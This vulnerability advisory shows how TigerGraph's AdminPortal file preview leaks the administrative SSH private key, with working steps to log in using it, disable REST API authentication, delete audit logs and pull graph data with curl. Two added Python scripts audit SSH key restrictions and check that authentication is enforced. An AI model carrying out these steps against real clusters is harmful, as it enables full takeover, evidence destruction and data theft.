The TigerGraph platform runs all system services as a single administrative user, tigergraph, who is able to log in remotely to the other nodes of a TigerGraph cluster over SSH. The installation guide lists this as a precondition for installing TigerGraph in a clustered configuration, and the set of administrative commands available to the tigergraph user as a result of this configuration is described in the (legacy) documentation.

This report shows that the TigerGraph platform does not sufficiently protect the SSH credentials of the administrative user and how this can be exploited to give an attacker full control over an entire TigerGraph cluster and underlying servers.

Impact

Severe. This vulnerability is a vector that can be used to obtain administrative privileges on a remote TigerGraph platform. It increases the severity of CVE-2022-30331 by showing that there are multiple ways of obtaining administrative-level privileges, for example by utilizing existing vulnerabilities such as CVE-2023-22950 (data loading) and CVE-2023-22949 (logging of user credentials). Once an attacker has access to an administrative shell, they have full control over the entire TigerGraph cluster and the underlying servers.

Products/Versions Affected

  • TigerGraph Enterprise Free Edition 3.7.0 Docker Image
  • TigerGraph Enterprise Free Edition 3.7.0
  • TigerGraph Cloud

We suspect that this vulnerability is present in all existing TigerGraph products (although this is not confirmed).

Steps to Reproduce

Download and Run TigerGraph

Using Docker, download the latest TigerGraph image and start the server:

1.) Optional: clean-up old TigerGraph docker images and obtain the latest version:
docker rm tigergraph
docker pull docker.tigergraph.com/tigergraph:latest
2.) Download and run the docker image (note: we do not need to attach a volume):
docker run -d \
-p 14022:22 \
-p 9000:9000 \
-p 14240:14240 \
--name tigergraph \
--ulimit nofile=1000000:1000000 \
-t docker.tigergraph.com/tigergraph:latest
3.) Once the container has started, connect to it via SSH (note: the default password is 'tigergraph'):
ssh -p 14022 tigergraph@localhost
4.) Start all TigerGraph services:
gadmin start all
5.) Using GSQL, create a new graph called test and add a node to it:
$ gsql
GSQL> CREATE VERTEX Node(PRIMARY_ID id UINT, value STRING) WITH primary_id_as_attribute="true"
GSQL> CREATE GRAPH test(*)
GSQL> begin
GSQL> CREATE QUERY ins(UINT id, STRING value) FOR GRAPH test {
GSQL> INSERT INTO Node VALUES(id, value);
GSQL> }
GSQL> end
GSQL> interpret query ins(1,"hello")
6.) Enable RESTPP authentication:
gadmin config set RESTPP.Factory.EnableAuth true
gadmin config apply -y
gadmin restart restpp nginx gui gsql -y

Obtaining Administrative SSH Credentials

To demonstrate that the SSH credentials of the administrative user are readily obtainable, we download them via the AdminPortal. This step assumes that the login credentials of the administrative user are known, which is a plausible situation (see CVE-2023-22949, which details how to locate the login credentials of the administrative user within the system logs).

If, however, the login credentials are not known, the SSH credentials can also be exfiltrated from the TigerGraph platform using the technique described in CVE-2023-22950, where a user with low privileges is able to exploit a weakness in GSQL to load data from arbitrary files into the database. We also found that it is possible to exfiltrate the SSH credentials under normal operating conditions by exploiting GSQL's UDF facility to read arbitrary files (see CVE-2022-30331).

Login To The AdminPortal

The simplest way to obtain the administrative user's credentials is via the AdminPortal; to do this, follow these steps:

1.) Open a web browser and go to https://localhost:14240, where you will be able to log in to GraphStudio as the tigergraph user.
2.) Click on the "Admin" button in the top-right corner to switch into administrative mode (called the AdminPortal).

Downloading SSH Credential via AdminPortal

Once logged into the AdminPortal, follow these steps to download the SSH private key of the tigergraph user:

  1. On the left-hand side expand the “Others” menu.
  2. Click on “GSQL Output File” to open the file preview pane.
  3. In the "File path" textbox enter the text "/home/tigergraph/.ssh/tigergraph_rsa".
  4. Click “Preview” to check that the file exists – if it does the first few lines will be displayed.
  5. Finally, click “Download” and the file will be downloaded to your local computer. On our system it was called m1_tigergraph_rsa.

Using The SSH Credentials To Obtain Access

Once the SSH credentials of the administrative user have been obtained they can be used to authenticate with the remote TigerGraph server and obtain shell access as the administrative user without requiring a password.

1.) Change the file permissions and load the credentials into your SSH agent:
chmod 0600 m1_tigergraph_rsa

ssh-add -l
The agent has no identities.

ssh-add m1_tigergraph_rsa
Identity added: m1_tigergraph_rsa (m1_tigergraph_rsa)
ssh-add -l
4096 SHA256:vLvC0SaCrFDiJ/BbcP7c0GcA3tBoXxq+Om9kZg+t14Q m1_tigergraph_rsa (RSA)
2.) Using this private SSH key it is possible to login to the remote TigerGraph server as the administrative user (tigergraph) without requiring a password via SSH. In our docker setup we simply connect to localhost on port 14022:
ssh tigergraph@localhost -p 14022
The authenticity of host '[localhost]:14022 ([::1]:14022)' can't be established.
ED25519 key fingerprint is SHA256:zQKFdcNAdX7TwiBtQT1vuDdHWm2o07kS/mcwnSFeMYY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[localhost]:14022' (ED25519) to the list of known hosts.
james@localhost's password:

Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.10.104-linuxkit x86_64)

* Documentation:https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support:https://ubuntu.com/advantage

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Mon Jun 20 12:28:10 2022 from 172.17.0.1
tigergraph@092eb28b2d49:~$

If successful, you should see a shell session in which you can freely execute commands as the tigergraph user.
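What makes the copied key so valuable is that nothing about it limits where it may be used from. The following Python script is an added example, not code from the advisory or from TigerGraph: it audits an authorized_keys file for entries that lack a from= source restriction or the restrict option, and checks that a private key file grants no permissions to group or others. The sample authorized_keys content is constructed and the key material is bogus.

```python
import os
import stat

# Added example, not part of the original advisory or of TigerGraph.

KEY_TYPE_PREFIXES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")


def split_options(opts):
    """Split an authorized_keys option list on commas that are not inside quotes."""
    parts, buf, quoted = [], [], False
    for ch in opts:
        if ch == '"':
            quoted = not quoted
        if ch == "," and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    if buf:
        parts.append("".join(buf))
    return parts


def parse_key_line(line):
    """Return (options, key_type, comment) for a key line, None for blank/comment lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith(KEY_TYPE_PREFIXES):
        options, rest = [], line
    else:
        # The option field ends at the first space that is not inside double quotes.
        quoted, i = False, 0
        while i < len(line) and (quoted or line[i] != " "):
            if line[i] == '"' and (i == 0 or line[i - 1] != "\\"):
                quoted = not quoted
            i += 1
        options, rest = split_options(line[:i]), line[i:].strip()
    fields = rest.split(None, 2)
    if len(fields) < 2:
        return None
    return options, fields[0], (fields[2] if len(fields) == 3 else "")


def audit_authorized_keys(text):
    """Return (line_no, key_type, comment, problems) for each insufficiently restricted key."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        parsed = parse_key_line(raw)
        if parsed is None:
            continue
        options, key_type, comment = parsed
        names = {opt.split("=", 1)[0] for opt in options}
        problems = []
        if "from" not in names:
            problems.append("no from= restriction: key is usable from any source address")
        if "restrict" not in names:
            problems.append("no restrict option: agent/port forwarding and PTY allowed")
        if problems:
            findings.append((line_no, key_type, comment, problems))
    return findings


def private_key_mode_ok(mode):
    """True if the permission bits grant nothing to group or others (e.g. 0600)."""
    return (mode & (stat.S_IRWXG | stat.S_IRWXO)) == 0


def audit_private_key_file(path):
    """Check an on-disk private key's mode, e.g. /home/tigergraph/.ssh/tigergraph_rsa."""
    return private_key_mode_ok(stat.S_IMODE(os.stat(path).st_mode))


# Constructed sample file contents; the key material is deliberately bogus.
SAMPLE_AUTHORIZED_KEYS = """\
# constructed sample, not copied from any real host
ssh-rsa AAAAB3NzaC1yc2E...constructed tigergraph@m1
from="10.0.0.0/24",restrict ssh-ed25519 AAAAC3NzaC1lZDI1NTE5...constructed tigergraph@m2
command="/usr/bin/env true" ssh-rsa AAAAB3NzaC1yc2E...constructed backup@m3
from="10.0.0.11" ssh-rsa AAAAB3NzaC1yc2E...constructed tigergraph@m4
"""

if __name__ == "__main__":
    for line_no, key_type, comment, problems in audit_authorized_keys(SAMPLE_AUTHORIZED_KEYS):
        print(f"line {line_no} ({key_type} {comment}): " + "; ".join(problems))
```

Pinning the cluster key with from= to the addresses of the cluster nodes means a copy of tigergraph_rsa carried off the box is refused from anywhere else, which is the part that defeats the login shown above. Because restrict also disables PTY allocation, exercise gadmin's remote operations on a staging cluster before adding it to a production authorized_keys file.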

Circumventing Security Features And Exfiltrating Data

Now that we have shell access as the administrative user, we can disable authentication for the REST API and wipe out a selection of the system's audit logs:

tigergraph@092eb28b2d49:~$ gadmin config set RESTPP.Factory.EnableAuth false
[   Info] Configuration has been changed. Please use 'gadmin config apply' to persist the changes.
tigergraph@092eb28b2d49:~$ gadmin config apply
[   Note] Changes:
RESTPP.Factory.EnableAuth: true -> false
Proceed to apply? (y/N)y
[   Info] Successfully applied configuration change. Please restart services to make it effective immediately.
tigergraph@092eb28b2d49:~$ gadmin restart restpp nginx gui gsql -y
[   Info] Stopping NGINX RESTPP GSQL GUI
[   Info] Starting ZK ETCD DICT KAFKA ADMIN GSE NGINX GPE RESTPP KAFKASTRM-LL KAFKACONN GSQL GUI
tigergraph@092eb28b2d49:~$ rm gsql/* restpp/* controller/*

To prove that authentication is disabled, we now exfiltrate some sensitive data from a second graph `test` that has zero authorized users:

curl -X GET "https://localhost:14240/restpp/graph/test/vertices/Node"
{"version":{"edition":"enterprise","api":"v2","schema":1},"error":false,"message":"","results":[{"v_id":"1","v_type":"Node","attributes":{"id":1,"value":"hello"}}]}%
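An operator can turn the curl check above into a routine assertion that RESTPP authentication is still enforced. The following Python script is an added example, not code from the advisory or from TigerGraph: it classifies the response to a token-less request against one of your own vertex endpoints as open, rejected, error or unknown, and interprets the value printed by gadmin config get RESTPP.Factory.EnableAuth. The open response body is the one shown above; the rejected body, the assumption that a rejection message mentions authentication, and the assumption that gadmin prints the bare value are constructed and must be checked against your deployment.

```python
import json
import ssl
import urllib.error
import urllib.request

# Added example, not part of the original advisory or of TigerGraph. The
# response shape for a rejected request is an ASSUMPTION; the open response
# shape is the one observed in the advisory.


def classify_restpp_response(status, body):
    """Classify a response to a request sent WITHOUT a token.

    "open"     - vertex data came back, so authentication is off
    "rejected" - the server refused the request for lack of credentials
    "error"    - the server reported some other error (e.g. unknown graph)
    "unknown"  - anything else
    """
    if status in (401, 403):
        return "rejected"
    try:
        doc = json.loads(body)
    except ValueError:
        return "unknown"
    if doc.get("error") is False and doc.get("results"):
        return "open"
    if doc.get("error") is True:
        # Assumption: an authentication refusal mentions "auth" in its message.
        return "rejected" if "auth" in doc.get("message", "").lower() else "error"
    return "unknown"


def fetch_unauthenticated(url, verify_tls=True):
    """GET url with no Authorization header; returns (status, body)."""
    ctx = ssl.create_default_context()
    if not verify_tls:          # only for a lab container with a self-signed certificate
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    try:
        with urllib.request.urlopen(url, context=ctx, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def verify_auth_enforced(base_url, graph, vertex_type, fetch=fetch_unauthenticated):
    """Probe one vertex endpoint of your own server; "open" means auth is disabled."""
    url = f"{base_url}/restpp/graph/{graph}/vertices/{vertex_type}"
    status, body = fetch(url)
    return classify_restpp_response(status, body)


def auth_enabled_from_gadmin_output(output):
    """Interpret the output of `gadmin config get RESTPP.Factory.EnableAuth`.

    Assumption: the command prints just the value ("true" or "false")."""
    value = output.strip().lower()
    if value not in ("true", "false"):
        raise ValueError(f"unexpected gadmin output: {output!r}")
    return value == "true"


# Response body observed in the advisory once authentication had been disabled.
OBSERVED_OPEN_BODY = ('{"version":{"edition":"enterprise","api":"v2","schema":1},'
                      '"error":false,"message":"","results":[{"v_id":"1","v_type":"Node",'
                      '"attributes":{"id":1,"value":"hello"}}]}')
# Constructed stand-in for a rejected request (exact wording may differ).
CONSTRUCTED_REJECTED_BODY = '{"error":true,"message":"Authentication failed"}'


def fake_fetch_open(url):
    return 200, OBSERVED_OPEN_BODY


def fake_fetch_rejected(url):
    return 401, CONSTRUCTED_REJECTED_BODY


if __name__ == "__main__":
    base = "https://localhost:14240"
    print(verify_auth_enforced(base, "test", "Node", fetch=fake_fetch_open))      # open
    print(verify_auth_enforced(base, "test", "Node", fetch=fake_fetch_rejected))  # rejected
```

Run with the real fetch_unauthenticated against a graph that is supposed to have no open access; anything other than "rejected" is worth an alert, and pairing the probe with the gadmin value catches the configuration change itself even before a request reveals it.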